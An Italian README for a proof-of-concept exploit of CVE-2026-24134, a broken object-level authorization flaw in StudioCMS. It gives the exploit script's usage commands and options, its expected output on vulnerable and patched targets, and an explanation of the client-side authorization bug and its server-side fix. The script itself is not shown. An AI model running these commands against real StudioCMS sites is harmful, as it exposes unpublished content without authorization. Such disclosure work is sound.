
Proof-of-concept exploit per CVE-2026-24134, una vulnerabilità Broken Object Level Authorization in StudioCMS, che dimostra l'accesso non autorizzato ai contenuti in bozza.
Questo repository contiene la Proof of Concept (PoC) per CVE-2026-24134, una vulnerabilità di Broken Object Level Authorization (BOLA) in StudioCMS.
cve_2026_24134_poc.py - Script di sfruttamento in Pythonpip install requests colorama
# Utilizzo di base
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
# Salva l'output in un file
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
--save
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--auto-test \
--visitor-user visitor01 \
--visitor-pass visitorpass \
--editor-user editor01 \
--editor-pass editorpass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
-u, --url - URL di base di StudioCMS di destinazione--uuid - UUID del contenuto bozza di destinazione--username - Nome utente per l'autenticazione--password - Password per l'autenticazione--auto-test - Abilita il test automatico--visitor-user - Nome utente dell'account visitatore--visitor-pass - Password dell'account visitatore--editor-user - Nome utente dell'account editor--editor-pass - Password dell'account editor--save - Salva il contenuto della risposta in un file--no-ssl-verify - Disabilita la verifica del certificato SSLpython3 cve_2026_24134_poc.py \
--url http://target.com \
--auto-test \
--visitor-user test_visitor \
--visitor-pass SecurePass123! \
--editor-user test_editor \
--editor-pass SecurePass456! \
--uuid 12345678-1234-1234-1234-123456789abc
Output previsto se vulnerabile:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!
Output previsto se corretto:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT
python3 cve_2026_24134_poc.py \
--url http://localhost:4321 \
--username attacker \
--password pass123 \
--uuid target-uuid-here \
--save
Questo salverà l'intero contenuto bozza in draft_{uuid}.html.
[+] - Operazione riuscita (verde)[*] - Messaggio informativo (blu)[!] - Avviso (giallo)[-] - Errore (rosso)Se stai eseguendo una versione vulnerabile di StudioCMS, aggiorna immediatamente alla versione corretta.
Il Problema Reale: I controlli di autorizzazione venivano eseguiti lato client (JavaScript), non lato server.
Secondo il team di sviluppo:
"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."
La Soluzione: Spostare l'autorizzazione dal client al server.
Principio Chiave: Non fidarti mai del client. La sicurezza lato client = miglioramento dell'esperienza utente. La sicurezza lato server = protezione reale.
IMPORTANTE: Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.
Per domande su questa PoC o sulla vulnerabilità:
Questa PoC è rilasciata per scopi educativi. Usala in modo responsabile ed etico.